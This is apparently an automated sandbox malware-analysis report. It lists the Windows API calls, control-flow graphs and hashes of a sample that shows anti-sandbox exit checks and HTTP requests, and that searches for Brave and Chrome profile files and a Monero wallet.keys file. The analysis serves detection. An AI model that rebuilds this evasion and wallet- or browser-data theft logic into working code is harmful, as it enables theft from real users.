                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 003811D0: ExitProcess.KERNEL32 ref: 00381211
                            • Part of subcall function 00381160: GetSystemInfo.KERNEL32(?), ref: 0038116A
                            • Part of subcall function 00381160: ExitProcess.KERNEL32 ref: 0038117E
                            • Part of subcall function 00381110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0038112B
                            • Part of subcall function 00381110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00381132
                            • Part of subcall function 00381110: ExitProcess.KERNEL32 ref: 00381143
                            • Part of subcall function 00381220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0038123E
                            • Part of subcall function 00381220: __aulldiv.LIBCMT ref: 00381258
                            • Part of subcall function 00381220: __aulldiv.LIBCMT ref: 00381266
                            • Part of subcall function 00381220: ExitProcess.KERNEL32 ref: 00381294
                            • Part of subcall function 00396770: GetUserDefaultLangID.KERNEL32 ref: 00396774
                            • Part of subcall function 00381190: ExitProcess.KERNEL32 ref: 003811C6
                            • Part of subcall function 00397850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003811B7), ref: 00397880
                            • Part of subcall function 00397850: RtlAllocateHeap.NTDLL(00000000), ref: 00397887
                            • Part of subcall function 00397850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0039789F
                            • Part of subcall function 003978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00397910
                            • Part of subcall function 003978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00397917
                            • Part of subcall function 003978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0039792F
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E39018,?,003A110C,?,00000000,?,003A1110,?,00000000,003A0AEF), ref: 00396ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00396AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00396AF9
                          • Sleep.KERNEL32(00001770), ref: 00396B04
                          • CloseHandle.KERNEL32(?,00000000,?,00E39018,?,003A110C,?,00000000,?,003A1110,?,00000000,003A0AEF), ref: 00396B1A
                          • ExitProcess.KERNEL32 ref: 00396B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                          • String ID:
                          • API String ID: 2525456742-0
                          • Opcode ID: 27af73ac4d39da96a77751ef4b45f2d6afef33cd0f1e3cc20447df60f4fdef43
                          • Instruction ID: 6b975b890f711220085b75eb5934f116fec582bc0825cb981adddc13a7922dc3
                          • Opcode Fuzzy Hash: 27af73ac4d39da96a77751ef4b45f2d6afef33cd0f1e3cc20447df60f4fdef43
                          • Instruction Fuzzy Hash: 99310971914609AADF06FBF0DC5BFEE7B78AF14740F104618F202AA192EF706905D7A2

                          Control-flow Graph

                          control_flow_graph 1436 381220-381247 call 3989b0 GlobalMemoryStatusEx 1439 381249-381271 call 39da00 * 2 1436->1439 1440 381273-38127a 1436->1440 1442 381281-381285 1439->1442 1440->1442 1444 38129a-38129d 1442->1444 1445 381287 1442->1445 1447 381289-381290 1445->1447 1448 381292-381294 ExitProcess 1445->1448 1447->1444 1447->1448
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0038123E
                          • __aulldiv.LIBCMT ref: 00381258
                          • __aulldiv.LIBCMT ref: 00381266
                          • ExitProcess.KERNEL32 ref: 00381294
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 3404098578-2766056989
                          • Opcode ID: b2706110bd2cd010f571cc973cb9ca4553c5fd51bacff6fe71d9c0944b421779
                          • Instruction ID: ce109f179e5ec50dfda1f623d6167f2db447040788b458c7ffd1962a41807aca
                          • Opcode Fuzzy Hash: b2706110bd2cd010f571cc973cb9ca4553c5fd51bacff6fe71d9c0944b421779
                          • Instruction Fuzzy Hash: 0E011DB0D44308BAEF11EBE4DC4AF9EBB7CAB14705F208488F705BA2C0D7B455468799

                          Control-flow Graph

                          control_flow_graph 1450 396af3 1451 396b0a 1450->1451 1453 396aba-396ad7 call 39aad0 OpenEventA 1451->1453 1454 396b0c-396b22 call 396920 call 395b10 CloseHandle ExitProcess 1451->1454 1459 396ad9-396af1 call 39aad0 CreateEventA 1453->1459 1460 396af5-396b04 CloseHandle Sleep 1453->1460 1459->1454 1460->1451
                          APIs
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E39018,?,003A110C,?,00000000,?,003A1110,?,00000000,003A0AEF), ref: 00396ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00396AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00396AF9
                          • Sleep.KERNEL32(00001770), ref: 00396B04
                          • CloseHandle.KERNEL32(?,00000000,?,00E39018,?,003A110C,?,00000000,?,003A1110,?,00000000,003A0AEF), ref: 00396B1A
                          • ExitProcess.KERNEL32 ref: 00396B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                          • String ID:
                          • API String ID: 941982115-0
                          • Opcode ID: cff3c0624422e0c828212ff853bec0222643be9130b2354f78961ee07c3b8749
                          • Instruction ID: d75eb4653aa9644ed1ff582760f580b8f72ad07815b67461fbabed725ef43d0f
                          • Opcode Fuzzy Hash: cff3c0624422e0c828212ff853bec0222643be9130b2354f78961ee07c3b8749
                          • Instruction Fuzzy Hash: ABF05E70944609AFEF02ABA0DC0BBBE7B78FB14745F104514B503A51C1DBB05544E696

                          Control-flow Graph

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00384839
                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00384849
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1274457161-4251816714
                          • Opcode ID: 1a373fd53b81dfc5763e71277d744e44319d2de9752b8d9ba00608c48be5b94e
                          • Instruction ID: b01511d1a0c7bfb3f345f29a308a30aa607632bf81a8a0c6d2c38ce42be0e2fc
                          • Opcode Fuzzy Hash: 1a373fd53b81dfc5763e71277d744e44319d2de9752b8d9ba00608c48be5b94e
                          • Instruction Fuzzy Hash: CF214FB1D00209ABDF14DFA4E845ADE7B75FB44320F108625F915AB2C1EB706A09CF81

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • Part of subcall function 00386280: InternetOpenA.WININET(003A0DFE,00000001,00000000,00000000,00000000), ref: 003862E1
                            • Part of subcall function 00386280: StrCmpCA.SHLWAPI(?,00E3EA88), ref: 00386303
                            • Part of subcall function 00386280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00386335
                            • Part of subcall function 00386280: HttpOpenRequestA.WININET(00000000,GET,?,00E3DFD8,00000000,00000000,00400100,00000000), ref: 00386385
                            • Part of subcall function 00386280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003863BF
                            • Part of subcall function 00386280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003863D1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00395228
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                          • String ID: ERROR$ERROR
                          • API String ID: 3287882509-2579291623
                          • Opcode ID: a3e1f226786c0d4bc0337cb1837cb013e00d495bf40278b576f13dcf26b2c28d
                          • Instruction ID: 052276dff5a865f1fb954c1536b1e3adc98f4af3277d83199dd00dc6c13743d6
                          • Opcode Fuzzy Hash: a3e1f226786c0d4bc0337cb1837cb013e00d495bf40278b576f13dcf26b2c28d
                          • Instruction Fuzzy Hash: 42112E30910908ABDF16FFA0DD52AED7778AF50300F404668F80A4E592EF30AB06D7D1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00397910
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00397917
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 0039792F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: b88e71bd35f9420ff54de30a18d923b90be08e06d5eb259c29cb01ec023c1b37
                          • Instruction ID: cac7a1c82624b38a6a81dfcb686bc9929629d5b56be2a2bbc03b2e0cf905f59d
                          • Opcode Fuzzy Hash: b88e71bd35f9420ff54de30a18d923b90be08e06d5eb259c29cb01ec023c1b37
                          • Instruction Fuzzy Hash: 6D0181B1A04608EFDB10DF98DD45FAABBBCFB04B25F10421AFA45E3680C37459048BA1
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0038112B
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00381132
                          • ExitProcess.KERNEL32 ref: 00381143
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: 48ba17fc91330bdd96ad2554df90a749fd9ff9b6a831b1a6685eb97311b15926
                          • Instruction ID: 49d6df66046bdaecfbbe25769b155e9e1caaf95d34808bc747af206903a0a5d2
                          • Opcode Fuzzy Hash: 48ba17fc91330bdd96ad2554df90a749fd9ff9b6a831b1a6685eb97311b15926
                          • Instruction Fuzzy Hash: C7E0E6B094534CFFE7106BA09C0EF097ABCEB14B05F204094F7097A1D0D6B52A45A799
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003810B3
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 003810F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: cd44674056fc2f07052030c4508d9d01ba6e53de6d019f04f94cea1702393ec4
                          • Instruction ID: 800b4a40c9547ab6f1e1073f157625b3221e36e6bfdd8a86ae83dda1e318d047
                          • Opcode Fuzzy Hash: cd44674056fc2f07052030c4508d9d01ba6e53de6d019f04f94cea1702393ec4
                          • Instruction Fuzzy Hash: D4F0E2B1641308BBEB14ABA4AC49FAAB7ECE705B15F300448F504E7280D5729E04DBA0
                          APIs
                            • Part of subcall function 003978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00397910
                            • Part of subcall function 003978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00397917
                            • Part of subcall function 003978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0039792F
                            • Part of subcall function 00397850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003811B7), ref: 00397880
                            • Part of subcall function 00397850: RtlAllocateHeap.NTDLL(00000000), ref: 00397887
                            • Part of subcall function 00397850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0039789F
                          • ExitProcess.KERNEL32 ref: 003811C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_0_2_380000_file.jbxd): identical to the list given for the first function entry above
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                          • String ID:
                          • API String ID: 3550813701-0
                          • Opcode ID: 6b55e9db2ca6386421c13d07d61fc5bab87c4f48a2e3e8f631e12406ec8e050c
                          • Instruction ID: efc716be42fc1c0b06f9ace52067a309b9967597a2243c0c3a881fe42a4a6437
                          • Opcode Fuzzy Hash: 6b55e9db2ca6386421c13d07d61fc5bab87c4f48a2e3e8f631e12406ec8e050c
                          • Instruction Fuzzy Hash: 49E012B592430557CE0173B0AC0FF2A379C9B6534DF040465FA05D6142FA25E805966A
                          APIs
                          • wsprintfA.USER32 ref: 003938CC
                          • FindFirstFileA.KERNEL32(?,?), ref: 003938E3
                          • lstrcat.KERNEL32(?,?), ref: 00393935
                          • StrCmpCA.SHLWAPI(?,003A0F70), ref: 00393947
                          • StrCmpCA.SHLWAPI(?,003A0F74), ref: 0039395D
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00393C67
                          • FindClose.KERNEL32(000000FF), ref: 00393C7C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_0_2_380000_file.jbxd): identical to the list given for the first function entry above
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 1125553467-2524465048
                          • Opcode ID: 95438b918410391c9fea37fc71eca75ad884f2caf3625aa7025e69796e9bc87c
                          • Instruction ID: c3a8975c45701afbfdd6477c2a058f95b87eed1f78da8170ee7784bcb7b6a0c3
                          • Opcode Fuzzy Hash: 95438b918410391c9fea37fc71eca75ad884f2caf3625aa7025e69796e9bc87c
                          • Instruction Fuzzy Hash: E5A140B19006089FDF25DFA4DC85FEA7778FB59304F044588E60DA6141EB759B88CFA2
                          APIs
                          • wsprintfA.USER32 ref: 0039492C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00394943
                          • StrCmpCA.SHLWAPI(?,003A0FDC), ref: 00394971
                          • StrCmpCA.SHLWAPI(?,003A0FE0), ref: 00394987
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00394B7D
                          • FindClose.KERNEL32(000000FF), ref: 00394B92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_0_2_380000_file.jbxd): identical to the list given for the first function entry above
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$%s\%s$%s\*$h
                          • API String ID: 180737720-834126881
                          • Opcode ID: 2e81663ea0b5480c4543807f6ddef3af01c6070bf2b633eee2796d0d0ca5f5c1
                          • Instruction ID: 17ecaf162a809959499993bf59871151009994cc5e72bcec8d25752c86204a09
                          • Opcode Fuzzy Hash: 2e81663ea0b5480c4543807f6ddef3af01c6070bf2b633eee2796d0d0ca5f5c1
                          • Instruction Fuzzy Hash: 6F6164B2900618AFCF25EBA0DC49EEA77BCFB59704F044588F549A6040EB759B89CF91
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                          • FindFirstFileA.KERNEL32(00000000,?,003A0B32,003A0B2B,00000000,?,?,?,003A13F4,003A0B2A), ref: 0038BEF5
                          • StrCmpCA.SHLWAPI(?,003A13F8), ref: 0038BF4D
                          • StrCmpCA.SHLWAPI(?,003A13FC), ref: 0038BF63
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0038C7BF
                          • FindClose.KERNEL32(000000FF), ref: 0038C7D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated dumps and Joe Sandbox IDA Plugin snapshot (hcaresult_0_2_380000_file.jbxd): identical to the list given for the first function entry above
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 3334442632-726946144
